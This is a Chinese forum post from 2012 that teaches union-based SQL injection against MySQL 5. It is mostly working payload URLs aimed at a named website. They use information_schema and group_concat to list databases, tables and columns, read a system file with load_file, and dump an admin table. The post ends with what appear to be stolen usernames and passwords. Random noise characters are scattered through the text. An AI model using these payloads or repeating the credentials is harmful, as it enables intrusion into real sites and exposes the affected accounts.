此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似- t7 g9 p/ ?0 G0 a$ Z
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人3 a4 ~& F/ a" M2 J6 ?4 I0 j
/ e: m6 \- Z. @# g" } j: `1 v6 E) h8 W) u% E
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
( h7 }) V+ O F/ T) x6 e6 v0 u' R9 s% d
+ i( u5 y8 X/ Y- p5 Q) j: l: s6 p7 J, ^! N4 X缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
0 i5 A0 h% E1 j' U6 V
& w8 V9 ?$ v2 }3 d/ F下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示' n( l7 l( I5 p
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
) J/ q7 F& X* S# Y0 L
, j1 g# r4 {0 h0 V+ q2 V+ @http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,177 T1 \" j% c' e, h; N! f5 Z3 [; F
+ G8 z- g O! h% g: H
读出所有库:
$ x+ ~2 G* x8 ~" p" v- shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA, v/ @) I' G# N$ }
; M5 b) u. [9 G
! ?' L. d, g' S# @- z8 C6 K
0 z: `! q3 I4 u2 z$ ]读出所有表:
0 \" G4 N2 Y8 R9 }) w9 R' `9 Nhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
$ y* v- b0 [: m( O( i2 ^. t% a% ] F4 k+ Q
读出所有表字段:2 y" I( \8 R! @- u- _% }
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)) K9 v/ T6 a: r; w7 p
*/ (97,100,109,105,110)为admin的ascii码 依次类推& H t2 i; Z7 W: `; B( v: P
8 ]0 F& K% y) m, ~: x
读出所有表字段里的内容:+ X& E. A6 j, B5 ? h; x
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin. H. r' r4 q5 X0 |
4 C7 d; ~: ~# Z2 `
Z; p3 S, b- T& u8 \) H
+ u; y8 i* o! b3 z E
6 \8 B- k# Z" k6 W" f$ B* \
$ O8 ?. g0 n! o4 Q
1 E$ S/ b. p) _" R/ `! p- Fhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23- s! ?( l( n' z7 z+ x
$ V4 B9 C( N3 }2 A& Q
6 N; P$ Y. Z: Qhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%230 g8 U! X+ L% d) u
% K& ]8 ]3 m; V! m3 i1 Rhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
1 ~" l6 `$ P$ G8 j, ], N* A' E, g0 U! R: Y4 e y
' B& ^6 [5 [+ F Y! K- E9 Q
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
* Q6 ]7 ~' K2 v& _% B( z# k, ?7 s2 M1 i0 l" e" A2 i
6 Q/ Z1 {1 x6 P webmaster:dzb521123,simlab:simadmin20043233
) E/ n6 p: v+ B |
发表于 2012-9-13 16:37:34
收藏
支持
反对